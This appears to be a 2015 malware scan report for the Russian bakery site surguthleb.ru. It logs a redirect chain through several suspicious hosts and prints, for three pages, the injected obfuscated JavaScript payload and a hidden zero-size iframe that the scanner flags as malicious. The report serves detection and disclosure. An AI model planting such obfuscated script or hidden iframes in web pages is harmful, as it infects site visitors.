Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=surguthleb.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://surguthleb.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: surguthleb.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 15 Feb 2015 12:33:05 GMT Location: http://web-redirect.ru/?web Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=utf-8 Set-Cookie: _cutt_caches_images=1424003585; expires=Mon, 16-Feb-2015 12:33:05 GMT; path=/ X-Powered-By: PHP/5.3.29 | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sun, 15 Feb 2015 12:33:05 GMT Pragma: no-cache Location: http://tatkuchma.com/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Sun, 15 Feb 2015 12:33:05 GMT X-Powered-By: PHP/5.3.3 | suspicious |
URL: http://tatkuchma.com/components/com_weblinks/2/separator.php (imitation of visitor from search engine) GET /components/com_weblinks/2/separator.php HTTP/1.1 Host: tatkuchma.com Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 15 Feb 2015 12:33:05 GMT Location: http://tvoiprazdnik.by/unit/ Server: nginx/1.4.4 Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://surguthleb.ru/ | 200 OK Content-Length: 42389 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var OlO='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kyTP9EKkxWaoNEZuVGcwFmLPlEbKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPlEbgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cu80TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTP9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJwkDMyQ0MlQWaGNTJzp2L1JnLhFWL5J2bt9yLBNTJwRHdoJjMlQ0MlMmczBjMlIjMlQHcpJ3YzFm Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://is.gd/u9kpsg <iframe src="http://is.gd/u9kpsg" width="0" height="0" frameborder="0"> | ||
http://surguthleb.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/media/com_acymailing/js/acymailing_module.js?v=450 | 200 OK Content-Length: 11742 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/templates/bread/javascript/jquery-2.0.2.min.js | 200 OK Content-Length: 83507 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/templates/bread/javascript/main.js | 200 OK Content-Length: 376 Content-Type: application/x-javascript | clean |
http://4geo.ru/maps/js/4geoAPI.js | 200 OK Content-Length: 20901 Content-Type: application/javascript | clean |
http://surguthleb.ru/modules/mod_hot_joomla_carousel/js/jquery.min.js | 200 OK Content-Length: 93871 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/modules/mod_hot_joomla_carousel/js/jquery.carousel.js | 200 OK Content-Length: 10291 Content-Type: application/x-javascript | clean |
http://surguthleb.ru/buy | 404 Not Found Content-Length: 2030 Content-Type: text/html | clean |
http://surguthleb.ru/index.php | 200 OK Content-Length: 42416 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var OlO='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kyTP9EKkxWaoNEZuVGcwFmLPlEbKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPlEbgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cu80TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTP9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJwkDMyQ0MlQWaGNTJzp2L1JnLhFWL5J2bt9yLBNTJwRHdoJjMlQ0MlMmczBjMlIjMlQHcpJ3YzFm Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://is.gd/u9kpsg <iframe src="http://is.gd/u9kpsg" width="0" height="0" frameborder="0"> | ||
http://surguthleb.ru/products/khleb-i-khlebobulochnaya-produktsiya | 200 OK Content-Length: 41179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var OlO='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kyTP9EKkxWaoNEZuVGcwFmLPlEbKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPlEbgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cu80TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTP9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJwkDMyQ0MlQWaGNTJzp2L1JnLhFWL5J2bt9yLBNTJwRHdoJjMlQ0MlMmczBjMlIjMlQHcpJ3YzFm Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://is.gd/u9kpsg <iframe src="http://is.gd/u9kpsg" width="0" height="0" frameborder="0"> | ||
http://surguthleb.ru/products/buy | 404 Not Found Content-Length: 2030 Content-Type: text/html | clean |